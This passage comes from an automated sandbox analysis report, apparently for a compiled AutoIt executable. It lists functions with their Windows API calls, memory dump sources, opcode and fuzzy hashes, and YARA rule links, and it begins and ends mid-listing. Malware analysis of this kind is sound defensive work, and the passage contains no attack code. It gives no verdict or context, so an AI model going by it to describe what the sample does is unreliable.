                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyString
                                                        • String ID: *j
                                                        • API String ID: 2173805711-1845181700
                                                        • Opcode ID: db6ebd12bd45f7e25bd87b74f231df49d9ac868ee190dedab7ccad9525a8772d
                                                        • Instruction ID: 3111b1779c4ea5b523c74cacc07e8ce79f0c255e6a6450359a39976f904cba66
                                                        • Opcode Fuzzy Hash: db6ebd12bd45f7e25bd87b74f231df49d9ac868ee190dedab7ccad9525a8772d
                                                        • Instruction Fuzzy Hash: 9131B372B04209DFCB04AFA4E8519BD37B6EF85305B504899F9026B2A1CB34991ADBB0
                                                        Function 00E7304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E7335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00E73077,?,?), ref: 00E73378
                                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E7307A
                                                        • _wcslen.LIBCMT ref: 00E7309B
                                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 00E73106
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                        • String ID: 255.255.255.255
                                                        • API String ID: 946324512-2422070025
                                                        • Opcode ID: 6ea5484657b3745ce31d18841941d05b4a9fa2aaa10a095af8181c83b436f52a
                                                        • Instruction ID: 948b6a8583abf002ac43fe2c6d361781364551371af3adb7ab6beab237f89cd3
                                                        • Opcode Fuzzy Hash: 6ea5484657b3745ce31d18841941d05b4a9fa2aaa10a095af8181c83b436f52a
                                                        • Instruction Fuzzy Hash: 2D31E4396002059FCB60CF38C485EAAB7E0EF54318F64D059E919AB392DB32EE45D770
                                                        Function 00E84653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E84705
                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E84713
                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E8471A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyWindow
                                                        • String ID: msctls_updown32
                                                        • API String ID: 4014797782-2298589950
                                                        • Opcode ID: bfae6f1206bdd5818dd74a8fe7ba74a1dd8a86e8b6989386f24fe057fd5211ae
                                                        • Instruction ID: af3df60653536d00d0251255af6d4b54e3d6cf9ddf83a8b9bacfaac2afba0747
                                                        • Opcode Fuzzy Hash: bfae6f1206bdd5818dd74a8fe7ba74a1dd8a86e8b6989386f24fe057fd5211ae
                                                        • Instruction Fuzzy Hash: 21214FF5600209AFDB10DF64DC81DB737ADEB8A358B141059FA08A7291DB71EC15DB60
                                                        Function 00E595AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 176396367-2734436370
                                                        • Opcode ID: 65512f9f3aae9d469f315f9ced068b83f48218a9a932f70c173f078d598cbd1d
                                                        • Instruction ID: dfff30cee83d925c7c20af29865d24095d63378498b5978177d8600bdadc41b7
                                                        • Opcode Fuzzy Hash: 65512f9f3aae9d469f315f9ced068b83f48218a9a932f70c173f078d598cbd1d
                                                        • Instruction Fuzzy Hash: 0C214372204211A6C731AA24DD02FFB73D8AF90315F506826FE49B7082EB90AD9DC2A1
                                                        Function 00E837B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E83840
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E83850
                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E83876
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: b117f7a3482af08c2f232399d4d42b78720abca7e1df70af7b51603727afcb9b
                                                        • Instruction ID: c0977406bafd9adf580723ffdcfa220b7f31619d86ffa2acc4fc2b366da31b9e
                                                        • Opcode Fuzzy Hash: b117f7a3482af08c2f232399d4d42b78720abca7e1df70af7b51603727afcb9b
                                                        • Instruction Fuzzy Hash: 7621C272610218BFEF219F65CC45FBB376EEF89B54F119125F908AB190CA72DC5287A0
                                                        Function 00E649F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E64A08
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E64A5C
                                                        • SetErrorMode.KERNEL32(00000000,?,?,00E8CC08), ref: 00E64AD0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume
                                                        • String ID: %lu
                                                        • API String ID: 2507767853-685833217
                                                        • Opcode ID: 07d390b7ba6cc9a35a1ad9f329c7dbbc6f5a49cfa6e65af31e57e1ade30add38
                                                        • Instruction ID: b95e5d851471e591efeb49ad78c4d312fe0ed78a552076ebcceb3c0db73c9978
                                                        • Opcode Fuzzy Hash: 07d390b7ba6cc9a35a1ad9f329c7dbbc6f5a49cfa6e65af31e57e1ade30add38
                                                        • Instruction Fuzzy Hash: 44315375A40109AFD710DF54C885EAABBF8EF09308F148095F909EB252D771ED45CB71
                                                        Function 00E841EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E8424F
                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E84264
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E84271
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        • Opcode ID: c40f1cfd1c44dd5a750bdba5f93bc427be3c202558888ce3929e29dc51def10e
                                                        • Instruction ID: b9cdb6430fb4c1b88b51f85c522292b84b36aed1ed66701b707a869c2f1ab5b2
                                                        • Opcode Fuzzy Hash: c40f1cfd1c44dd5a750bdba5f93bc427be3c202558888ce3929e29dc51def10e
                                                        • Instruction Fuzzy Hash: D411E771244209BEEF206F65CC05FAB37ACEF95B54F111124FA59F20E0D671D8119720
                                                        Function 00E52F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF6B57: _wcslen.LIBCMT ref: 00DF6B6A
                                                          • Part of subcall function 00E52DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E52DC5
                                                          • Part of subcall function 00E52DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E52DD6
                                                          • Part of subcall function 00E52DA7: GetCurrentThreadId.KERNEL32 ref: 00E52DDD
                                                          • Part of subcall function 00E52DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E52DE4
                                                        • GetFocus.USER32 ref: 00E52F78
                                                          • Part of subcall function 00E52DEE: GetParent.USER32(00000000), ref: 00E52DF9
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00E52FC3
                                                        • EnumChildWindows.USER32(?,00E5303B), ref: 00E52FEB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                        • String ID: %s%d
                                                        • API String ID: 1272988791-1110647743
                                                        • Opcode ID: d471fbed6827f816d38adfe85101080f8ed7083905af5f19e2eb8126af2ab3c5
                                                        • Instruction ID: ac2de57f4238f1a1d148e0702cb62ff5d14e54aedcecb6a0668ee06e973245c5
                                                        • Opcode Fuzzy Hash: d471fbed6827f816d38adfe85101080f8ed7083905af5f19e2eb8126af2ab3c5
                                                        • Instruction Fuzzy Hash: 2E11C0712002096BCF507F708C85EEE77AAEF95305F049479BE09BB192EE3099498B70
                                                        Function 00E85882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E858C1
                                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E858EE
                                                        • DrawMenuBar.USER32(?), ref: 00E858FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Menu$InfoItem$Draw
                                                        • String ID: 0
                                                        • API String ID: 3227129158-4108050209
                                                        • Opcode ID: 6860a8474cfccfb3500f1f421acc7fd25ca62c850752f597b5a2ba40205b0116
                                                        • Instruction ID: 684fdbf3fa4620a671264e74519d4bb160338d8f19e8ec48bc0d29fe98d683c6
                                                        • Opcode Fuzzy Hash: 6860a8474cfccfb3500f1f421acc7fd25ca62c850752f597b5a2ba40205b0116
                                                        • Instruction Fuzzy Hash: DA012D32500218EFDB21AF51DC44BAEBBB4FB85365F1090A9E85DE61A1DF308A95DF31
                                                        Function 00E4D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E4D3BF
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00E4D3E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: GetSystemWow64DirectoryW$X64
                                                        • API String ID: 3013587201-2590602151
                                                        • Opcode ID: 6b22a12cb74d4dc643d537443228ea0591a9a37830b19ad8ea471c69d0926a82
                                                        • Instruction ID: b06a92bfe6c77fd46bc466eae3bbc7a3f41d8c33ae32799e7ff5c9c3d0e5d309
                                                        • Opcode Fuzzy Hash: 6b22a12cb74d4dc643d537443228ea0591a9a37830b19ad8ea471c69d0926a82
                                                        • Instruction Fuzzy Hash: 61F05C3250E6119BD7712A109C44BDD32249F01B14F60B694E005F15E4D7A0CC8487A6
                                                        Function 00E5007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3dad3b6575060889d57f1c1c283335cb77711bc855389162acd4cb64ad1c4713
                                                        • Instruction ID: d88e5dc4956a181d8e7403f9c9883a11af18651750a5dadb93f2e584ca5208ba
                                                        • Opcode Fuzzy Hash: 3dad3b6575060889d57f1c1c283335cb77711bc855389162acd4cb64ad1c4713
                                                        • Instruction Fuzzy Hash: F5C15B75A0020AEFDB14CFA4C894AAEB7B5FF48705F209998F905EB251D731EE45CB90
                                                        Function 00E7342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInitInitializeUninitialize
                                                        • String ID:
                                                        • API String ID: 1998397398-0
                                                        • Opcode ID: 6f0e605bfd19d5bea6e4186ed4bb9187ddacc359df7add7ece8216d51c50471e
                                                        • Instruction ID: ad1613e7b837fa55b08343deed51cf1f3b4859b59fd0a0b7130c3c0c2183ea2d
                                                        • Opcode Fuzzy Hash: 6f0e605bfd19d5bea6e4186ed4bb9187ddacc359df7add7ece8216d51c50471e
                                                        • Instruction Fuzzy Hash: B1A16B75204304AFC700DF28C485A6AB7E5FF88714F05C859F98AAB362DB70EE05DBA1
                                                        Function 00E50436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E8FC08,?), ref: 00E505F0
                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E8FC08,?), ref: 00E50608
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,00E8CC40,000000FF,?,00000000,00000800,00000000,?,00E8FC08,?), ref: 00E5062D
                                                        • _memcmp.LIBVCRUNTIME ref: 00E5064E
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: FromProg$FreeTask_memcmp
                                                        • String ID:
                                                        • API String ID: 314563124-0
                                                        • Opcode ID: 7e04ce91a9f821daccd0e82534d7aa13b149e1f2f0a1e6c91e8b691243ed6bbd
                                                        • Instruction ID: 7ac1ddbe4e13042061862aaac6fbcdb6fbbb4467334a8a25c97e577e67c4a867
                                                        • Opcode Fuzzy Hash: 7e04ce91a9f821daccd0e82534d7aa13b149e1f2f0a1e6c91e8b691243ed6bbd
                                                        • Instruction Fuzzy Hash: 5481D775A00109AFCB04DF94C984EEEB7B9FF89315F205558F916BB250DB71AE0ACB60
                                                        Function 00E31391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: f3665cb920f8ab08398cf7d1e7f5fc926e8585fc7b4325c3455ebe6583434e2e
                                                        • Instruction ID: c35e79b90cf926c65d3474373cfedac9247d15c0d802b787bd621e3a05e7df14
                                                        • Opcode Fuzzy Hash: f3665cb920f8ab08398cf7d1e7f5fc926e8585fc7b4325c3455ebe6583434e2e
                                                        • Instruction Fuzzy Hash: E5411931A00110ABDB257BB99C4A6FE3EE5EF41374F1472ADF429F6192E6344881D3A1
                                                        Function 00E86278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00E862E2
                                                        • ScreenToClient.USER32(?,?), ref: 00E86315
                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00E86382
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID:
                                                        • API String ID: 3880355969-0
                                                        • Opcode ID: 67b739e6add12abd1a931ee7dc5285ea3129f563f4223542b8c1e0233b5c1b40
                                                        • Instruction ID: 51e4e7f8c154a652b357d864de4457370fe4267a88f1016ab3d8d5d3ef6e5b15
                                                        • Opcode Fuzzy Hash: 67b739e6add12abd1a931ee7dc5285ea3129f563f4223542b8c1e0233b5c1b40
                                                        • Instruction Fuzzy Hash: 9A511B74900209EFDF10EF68D880AAE7BB5FB95364F209169F919AB2A0D731ED41CB50
                                                        Function 00E71AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00E71AFD
                                                        • WSAGetLastError.WSOCK32 ref: 00E71B0B
                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E71B8A
                                                        • WSAGetLastError.WSOCK32 ref: 00E71B94
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$socket
                                                        • String ID:
                                                        • API String ID: 1881357543-0
                                                        • Opcode ID: 88a28d7c9fbd6574b482a8f07c84c8fedacf97df49d477888451e29592873232
                                                        • Instruction ID: 3b671b7f0f4926354fc7551a7aed7fb9d1854a5dc5f82245125c0ac730efd8f6
                                                        • Opcode Fuzzy Hash: 88a28d7c9fbd6574b482a8f07c84c8fedacf97df49d477888451e29592873232
                                                        • Instruction Fuzzy Hash: 02416D34640204AFE720AF24C886F7977E5EB44718F54D498FA1AAF7D3D672ED418BA0
                                                        Function 00E2B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
